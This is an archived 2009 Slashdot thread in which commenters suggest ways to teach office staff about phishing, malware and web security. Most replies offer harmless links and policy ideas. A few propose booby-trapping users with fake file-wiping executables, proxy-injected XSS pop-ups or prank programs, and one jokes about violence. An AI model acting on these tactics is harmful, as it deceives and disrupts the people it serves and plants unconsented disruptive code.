Forgot your password?
typodupeerror
Security

Impressing Security Upon End-Users Visually? 157

Posted by Soulskill
from the shake-your-fist-and-glare dept.
get quad writes "I continually have to remind our end-users to be vigilant about the usual web security hazards, such as not clicking links in the occasional spam email that passes through our filters, avoiding suspicious websites, why some websites aren't entirely safe or appropriate for the work environment (Facebook apps, MySpace, remote access apps, proxies, etc), and the myriad other things an end-user can do to get into trouble. What I'm hoping to find are video or flash examples (mind you, in layman's terms) of what Web-based exploits/zero-day threats are capable of, how they can happen, and the harm they can ultimately cause — rather than posting links to technical docs the users will never bother to read. Getting the point across in a purely visual and less technical manner seems much more effective. Does anyone have any suggestions or experience with this type of training?"
This discussion has been archived. No new comments can be posted.

Impressing Security Upon End-Users Visually?

Comments Filter:
  • Explosions! (Score:4, Funny)

    by sopssa (1498795) * <sopssa@email.com> on Saturday October 24, 2009 @11:25AM (#29856859) Journal

    Make a video where the user clicks "Run File" in Internet Explorer and then the building explodes.

    • Even easier with better impact, just give a simple security message that any wrong action on their part can open a security hole - then flash the g'tse [wikipedia.org] image.
      Your users will not dare to violate your security rules after that, and probably not ever again for the rest of their lives.
      • by snowraver1 (1052510) on Saturday October 24, 2009 @11:51AM (#29857081)
        Just show them this:

        http://www.youtube.com/watch?v=1SNxaJlicEU
          • by fyngyrz (762201) *

            ...remove the links, scripts and images from the emails before they get to the end user. If your users really can't be trusted with certain things, then why are you giving them the very things they can't be trusted with?

            No sensible person or company puts those things in an email any more, anyway. If you need to go do something with your account at your bank, the email just says, "Please go to your account and check your status." Anything further is probably spam, mal-something, or straight-up clueless.

      • Even easier with better impact, just give a simple security message that any wrong action on their part can open a security hole

        Didn't Microsoft already try UAC and fail miserably...

    • Re: (Score:3, Funny)

      by xgadflyx (828530) *
      Actually, we've found that "making an example" has been the most effective security measure. Call a meeting - "Tom here has decided to do $INSERT_ENDUSER_STUPIDITY, so we're going to take this time to show you what happens.." Then you just grab a hammer and smash fingers. Some people puke others just turn in disgust - regardless we haven't had a user click a fishing email in over 2 years.
    • Re: (Score:2, Funny)

      by Anonymous Coward

      There's a freeware program that, when run, starts flashing teh screen, and plays at MAX volume "HEY EVERONE, I'm looking at GAY porno!" ... just send that around, and people will quickly learn not to open programs.

    • Re: (Score:3, Insightful)

      by pentalive (449155)
      That may have the same sort of effect as "Reefer Madness" = Audience ignores message due to "over the top"ness of the presentation.
    • Re: (Score:3, Insightful)

      by Runaway1956 (1322357) *

      Hmmm. I read the posted question/summary. Started scrolling down, reading comments. Stopped. Go back up and read just the title. Hmmm. Forget everything else, just concentrate on the title.

      Could you make some kind of a monitoring app, which displays a graphic?

      I don't mean to make a new antivirus. Just some graphic attached to existing antivirus and anti-malware softwares. It monitors the stupid things people do, and displays a ribbon or something across the top of the toolbar. Put a red end on the

    • Re: (Score:3, Interesting)

      by DiegoBravo (324012)

      > such as not clicking links in the occasional spam email which passes through filters, avoiding suspicious websites,

      Just setup a daily CRON job to send an email with a link pointing to a page in your web server that shows:

      YOU CLICKED THE BAD LINK. YOU'RE AN IDIOT. NEXT TIME WE'LL CUT YOUR SALARY.

      For the email subject, just collect a handful of common spam phrases, like "Tired of seeing disappointed faces on women when they pull down your pants". Problem solved.

  • Why cant users choose their own level of security - idiots be dammed. But I bet you find a whole bunch of people wise-up really fast. :P
    • by 1s44c (552956) on Saturday October 24, 2009 @11:39AM (#29856977)

      Why cant users choose their own level of security - idiots be dammed. But I bet you find a whole bunch of people wise-up really fast. :P

      You could try it but I doubt it will make your life easier. Most users don't understand and don't care and will expect you to fix their mistakes over and over again. Most of them have some kind of twisted pride in their ignorance.

      There was research done on office staff by flashing up random warning messages on their screens, most users ignored the messages no matter what they said, clicked anything to get rid of the message, and immediately forgot there was even a message.

      • I agree - its like herding cattle. I was hoping to open a avenue of though concerning educating the user more... even if in an extreme example. Good thoughts friend. VERY interesting research cited... can you point us to the details? thanks!
    • by jimicus (737525)

      Because when their computer is completely hosed and borderline unusable as a direct result, the chances are the OP or someone in a similar role will have to pick up the pieces. This gets really old really fast.

      Myself, I think there may be something to be said for the endpoint security products that combine centrally managed antivirus, firewall and antispyware features.

    • I, for one, get paid to avoid them and my employers from wasting valuable time, money, and bandwidth both from such errors.

    • by DrNASA (849379)
      HAHAHA - spoken like the guy not responsible for cleaning up other people's messes and securing mission critical or personal data. Users choosing their own level of security is why (probably) more than 70% of GeekSquad work is wiping hard drives due to malware. In the real world of business, it is the sysadmins job to provide the resources to get the job done and keep data safe. That's it. Getting the job done does not include YouTube, Facebook, or Solitare (yes, there are cases where social media is requ
      • by shiftless (410350)

        Work is called that for a reason. Hopefully you are fortunate enough to enjoy the work that you do, making it seem less like work, but work it is and shall be and sucks to the whiners.

        This is one of those "facts" that was drilled into your brain as a child, then as a teenager, and as an adult. You just blindly accepted it without question as "the way things are", and now these are the "facts" you tell everyone you meet. Most people will grudgingly accept it as true, unsure as to why deep down inside they f

    • by pentalive (449155)
      Perhaps because the asset at risk is company data, and some of the users could not care less about company data. Some of those users might even be middle management. Upper management usually knows the value of the data but they have other follies.

      Joe User: Passwords do vex me - lets kill them now!

      IS Dept: But that will mean anyone could copy our data.

      Joe User: So? I could get my job done.

      IS Dept: Even our most hated competitors would know everything/

      Joe User: So? I could get my job done.

      IS Dept: ???

    • The whole bloody mess is mis-engineered... The secure settings in IE are a bear to browse with, and are still vulnerable to some zero day exploits. Windows itself is a mess, how many areas are there to check for programs that load at boot?

      the legacy dos files...
      the run and run-once lines in the registry (all of them)
      runservices
      load
      userinit
      the startup menu
      the startup menu for the user
      lots of the code doesnt work unless it gets full rein to jack your system. Turn on the windows based security an
  • by John Hasler (414242) on Saturday October 24, 2009 @11:38AM (#29856963) Homepage

    ...about computer security? Those work so well.

    • by gmuslera (3436)
      Probably a better example would be looking for a "Taken" about computer security... At least, the start of the movie, no matter how much we would like to hit, shot, stab, and put a spammer/botnet hoarder under electric shocks until the light gets cut for no payment.
    • Yes, they do, on a mass scale. When applied "properly" to things like smut, terrorism, gay marriage, etc, the "Reefer Madness" tactic works very well. In fact it's still working on the drug situation also. Otherwise prohibition would have been abolished a long time ago. Do not underestimate the power of "madness".

    • How about "Napster Baaaaad"?

  • I was spending some time with some friends of mine a few months back when the inevitable malware conversation came up. These friends happened to all be quite computer illiterate. What I did instead of giving the usual spiel about malware was show them a better experience.

    I sat them down and showed them how to use firefox with noscript. I showed them their favorite sites without all the baggage and they were amazed at the improved experience. I made sure I showed them how to use noscript with sites like facebook and still get what they wanted.

    All of this was done in less than 15 minutes, and they now use this combination on a daily basis, not because of the improved security, but because of the improved experience. The fact that their security is improved is entirely incidental.

    Note to firefox dev's, improve your enterprise management tools so that I can justify rolling out firefox to the enterprise after proving to management that it can be managed at the enterprise level. Enterprises need ways to consistently enforce policies with firefox using AD! Until this can be done firefox will never take over Internet Explorer in the Enterprise.

    • Re: (Score:3, Insightful)

      by ddillman (267710)
      Note to firefox dev's, improve your enterprise management tools so that I can justify rolling out firefox to the enterprise after proving to management that it can be managed at the enterprise level. Enterprises need ways to consistently enforce policies with firefox using AD! Until this can be done firefox will never take over Internet Explorer in the Enterprise.

      You know, sticking this down in some random response on a Slashdot discussion thread is not the most likely way to have Firefox devs see and pos

    • Send out a fake spam email. Anyone who clicks on the link gets a security warning letter and a "You are subject to termination for clicking on the link in an email. Contact HR immediately"

  • by Cyko_01 (1092499) on Saturday October 24, 2009 @11:39AM (#29856985) Homepage
    here is a great video that shows how to detect a phishing scam using examples http://www.youtube.com/watch?v=bzfPUmQcfDs [youtube.com]
  • Backdoor.Ghostnet (Score:3, Informative)

    by adnd74 (1022357) on Saturday October 24, 2009 @11:41AM (#29857013)
    Symantec Security Response [sarc.com] has an excellent video about Backdoor.Ghostnet [youtube.com] on their youtube channel [youtube.com].

    I think the message here is that if you don't practice safe computing, the tools exist that empower just about anyone to pwn you
  • You know what would be really cool? If you had a rewriting-proxy that would occasionally insert a cartoon spy in pages that could be unsafe, reminding/warning them about what could have happened. For example if they submitted a form with a password, and it wasn't encrypted, the spy could pop up and say "This password is unprotected, and could be snooped. Be sure not to use the same password for anything important!", and then have buttons the users could click to submit the form anyway or cancel. If they arr

    • A reminder/warning that user should click on to make it go away?

      How much time do you suppose would pass before:

      a) users completely ignore it, madly clicking [ OK ] without even looking at the text?
      b) it is spoofed and/or copied by malware sites, cartoon spy and all?

      Answer should be calculated in minutes and seconds, but feel free to use larger time units like hours and days.

  • by Unequivocal (155957) on Saturday October 24, 2009 @12:02PM (#29857157)

    http://www.scientificamerican.com/article.cfm?id=how-to-foil-phishing-scams [scientificamerican.com]

    This is a good start and I'd recommend investigating the author's other published material.

    • by JSG (82708)

      Hillarious: The original poster asks for advice and you post a "pay to read" link.

      I have nothing against a journalist trying to make a living but you were asked for your advice not someone else's (are you the author - can't be arsed to check.)

      This is a discussion about phishing, do you see what I am getting at?

      • I see there's some irony there. It's not phishing. The guy is looking resources, I point him towards an article with a solid bibliography. If he doesn't want to pay, that's his (or anyone else's) business. He can go to the library and look it up if he wants it for free, just like any other book or mag. Just b/c it's not free and on the internet doesn't mean it's not useful.

        I do agree that I should have pointed out that this is a for-fee site.

  • Check out Cisco's website. Really. Most of the time, they have some videos geared towards marketing and business types. They even have some cute superhero thing about threats. It drives me crazy because usually I go there for technical purposes, I want to see configuration commands and tech docs. But every once in a while I'll find a good diagram or video which gets my point across to non-techie types.
  • it doesn't matter how you explain it to them, whether it's pretty pictures or text, they won't understand or care.
  • http://cisr.nps.edu/cyberciege/ [nps.edu] is a video game designed to teach computer security concepts. In addition to its more advanced scenarios, it includes a few simple "awareness" scenarios, the first of which directly addresses your topic. Further, this animated movie: http://cisr.nps.edu/cyberciege/movies/02CIEGE.html [nps.edu] helps the layman understand why the problem of malicious software is so hard to solve. The link includes a free evaluation version of the game.

  • Videos help? (Score:4, Insightful)

    by MrCrassic (994046) <deprecated@emaELIOT.il minus poet> on Saturday October 24, 2009 @12:08PM (#29857209) Journal

    I figured that most people would treat videos on computer security like the videos that teachers would show at school. Their reaction?

    "NO WORK!!!"

    I think that what's most effective is just enforcing your security policies using Group Policy or other management tools on the network. That way, you KNOW that most people won't violate any policies set forth, and those that do are the ones that didn't need the training in the first place.

    If you're really adamant about educating your employees with videos and such, find REALLY GOOD videos that will hold their attention for their entire run. Remember, at the end of the day, those computers don't belong to them and most of them simply wish to get work done. Any teaching method which can exploit these two truths for educational value is probably worth watching.

  • Dark Ages (Score:2, Insightful)

    by banished (911141)
    My company's solution is to lock down the systems so tightly as to turn network systems into standalone systems.
  • by petes_PoV (912422) on Saturday October 24, 2009 @12:20PM (#29857277)
    Viruses, worms etc. aren't really the users' problem - unless you can categorically point the finger at an individual and get them fired (as an example, pour les autres). Why should they care if THE COMPANY computers crash, or slow down or give them reasons why they can't do their job?

    So why should they go to the inconvenience of not clicking on links that they want to, or not visiting any website that takes their fancy? By appealing to their "professionalism" or "humanity" or "team spirit" you're probably on a loser. While these might get them gee-d up for a short time, you can bet that unless there's some personal pain involved in doing it, they'll be back to their old habits in a few weeks time.

    Once you can put security in terms a normal user will understand: i.e. If you click on a bad website, these bad things will happen TO YOU, they'll pay attention. Until then you haven't got a chance.

    • by Abstrackt (609015)

      Excellent point about bringing personal pain.

      When I found some malware (Securitytool, basically holds the computer hostage) on one of the computers I called everyone around it and told them that because someone installed something they weren't supposed to, everyone who used that computer for online banking or any other important activities needed to change their passwords if they wanted to keep their bank accounts full. To this day I don't know who kept messing up that computer but it hasn't happened since.

  • by OpenSourced (323149) on Saturday October 24, 2009 @12:23PM (#29857297) Journal

    Nobody learns to avoid fire by being told. You have to get near and feel the heat to know you better not do it. So my advice is: make traps. Send them emails signed by other coworker asking for their password. Send them executable files that block their computer and flash a sign telling them that all their files are being erased, just because they executed a file from a unknown origin. All kind of traps, with nasty consequences if possible, you don't want them to click into everything because it can be another amusing idea of you. You want them scared of your ideas so that they look askance to every email or web page to see if it could be a trap. As they might be, so that's the right attitude.

  • It is pretty simple really. You have to set policy and communicate it. Then, if policy is broken the company must actually follow up with the repercussions stated in the policy. People are pretty smart - they understand repercussions. If the company doesn't back up the policy then it's not a policy, and there's no real reason for users to follow it.
  • Make yourself a laptop with a deep freeze image. this way you can infect the system at will, reboot and it's clean.

    Show the people using your system just how badly a zero-day exploit can hose a system.

    Reboot, show the next group. Rinse, repeat.

  • http://www.virtualforge.de/vmovie.php [virtualforge.de]

    the XSS and CSRF videos are very good visualizations for the common user using simple examples.

  • by JustNiz (692889) on Saturday October 24, 2009 @12:57PM (#29857583)

    Deny internet access to repeat offenders. They soon get the message that way.

  • Excellent question but, unfortunately, it hit the main /. page on a Saturday. Let's just say that the percentage of readers who are IT professionals drops off significantly over the weekend. Go figure.

    Most of your responses so far are along the lines of, "You NAZI! Leave your users alone and let the one's who don't learn get what they deserve." Obviously, not the response of an IT type who has to deal with regulatory requirements and wants to keep his job. You might try the same question again but on a

  • by mrsquid0 (1335303) on Saturday October 24, 2009 @01:03PM (#29857623) Homepage

    Hi, I'm Troy McClure. You may remember me from such IT security videos as "Microsoft Explorer: Ubiquitous but Unsecure" or "Passwords: The Road to Ruin".

  • A demostration of the "Customer Appreciation Bat" works wonders.

    Although since it's a corporate institution, the "Security Empowerment Bat" might be more effective.

  • I suggest you emphasize the possibilities of what the Chinese government hackers, Russian mafia, and US Customs & Border Patrol will do to them if they don't practice proper security procedures. A scene from "Deliverance" [youtube.com] that will get the point across. You know what I'm talking about.
  • by BLKMGK (34057) <morejunk4me@@@hotmail...com> on Saturday October 24, 2009 @01:47PM (#29857975) Homepage Journal

    Sunbelt Security had a video posted of what occurs when you got hit by the old WMF bug awhile back. You could see software being installed, icons appearing on the desktop, and the desktop background being modified as this thing went to town and began popping fake AV warnings. It was one of THE most extreme and informative examples I can think of for this.

    Here's a copy of it I found on Youtube. A search for "WMF exploit" on YouTube will get you plenty of hits :-)

    http://www.youtube.com/watch?v=WTBcDJ9kJH4 [youtube.com]

    IMO, I think this answers your question!

  • why not block access to anything non-approved?
    More accurately, only allow specific site.
    Yes some people will get around it, but most people capable enough to get around aren't high risk. How many people who know how to tunnel would also download smileys?

  • Maybe create some internal XSS that resides on your corporate proxy server. So when someone runs (say) a Facebook app, your XSS runs some Javascript off of an internal server that does something moderately annoying like continual pop-ups. Then if they click on one of the popups, disable their external web access completely.

  • why some websites aren't entirely safe or appropriate for the work environment (Facebook apps, MySpace, remote access apps, proxies, etc),

    Okay, I'll bite. Do facebook and myspace fall in the unsafe category, or are they just inappropriate? Obviously you don't want employees spending all their time at their desks screwing around with facebook, because you want them to be doing useful work. But if there's some actual security vulnerability that is opened up when a user simply goes to a web page with a certa

  • A normal brown-box Fedex-like package. When they open it, a balloon bursts and glitter goes everywhere.

    Maybe they'll learn not to open random packages when it means maybe cleaning glitter for six days.

  • People respond to their actual incentives, not what you pretend the incentives are.

    If people were held personally liable for damages caused by security breaches that they enabled, they would get smarter about security.

    I'm not arguing that they should be held liable, just that it's going to be hard to make them care when they aren't.
  • Send some "test" links yourself. When you manage to break into the user's machine, e-mail the user his own confidential document, password, etc. Then tell him _how_ he exposed himself and that you _could_ have been the bad guy.

    I learned how to use chmod properly this way a LONG time ago -- the teaching method was highly effective... :)

    (You will, of course, get the careless users ticked off -- so make sure you have management approval for this. But seeing _proof_ of what _will_ happen will get the message

  • 1. "If someone can do something wrong, someone will."
    There's no way to circumvent this. Ever. Period. You have to accept, that humans make errors. But it's ok if they learn from it.
    The problem is:

    2. "To get people to learn from something, they have to have an interest in it."
    So if it does not hurt them, and does not give them a advantage, then why should they learn anything? Humans are all about efficiency. In fact all competing life-forms ever, are. In all of the universe.
    So what do you do? You follow basic rules of creating a motivating gradient. By offering advantages for those who learn, and disadvantages for those who don't.

    Here, remember, that positive gradients (relative to the person's state) are always better, than negative ones (like punishment).

    So I recommend this: At the next raise of salaries, raise them a bit less. But offer the remaining part as a bonus for those who can prove their security-awareness.
    The amount is pretty easy to choose: It's the amount that you'd lose (e.g. the money to recover from loss or destruction), multiplied by the factor of likeliness (e.g. one in a million = 0.000001), divided by the number of people in the company (optional, depending on your p.o.v.).

    You could check their security-awareness, by testing them every year on a random day. Like a fire drill. But with a security drill. (Without announcing anything. Without any alarm going off.)
    And by filling out a question form at the end of the day (one that takes a negligible amount of time, and is also there, to refresh the knowledge. One more reason to make it a random day [= better learning])

    You can bet your mother on the fact that they will be much better at caring for security! ^^

    Only remember, to make all those drills, bonuses and tests proportional to the actual real amount of damage. Don't be surprised, if it then will be less than you thought.

  • A while back a slashdot comment had a link to security cartoon [securitycartoon.com]. The cartoons are cute and pretty thorough, though the may be a bit simple and are somewhat outdated. It's visual and pretty straightforward.

  • Usually, when something "bad" happens, you get to see the result. You lose your wallet, you can't pay next time you have to. Someone breaks into your house, everything's turned upside down. With malware, there just ain't anything to see.

    To make things worse, people have been told by Hollywood that there is something to see. Computer screens "melting" or outright explosions (those dreaded 220kV lines in those flatscreens ... you know...), or at least some nifty CGI (honestly, every time someone searches fing

Philogyny recapitulates erogeny; erogeny recapitulates philogyny.

Working...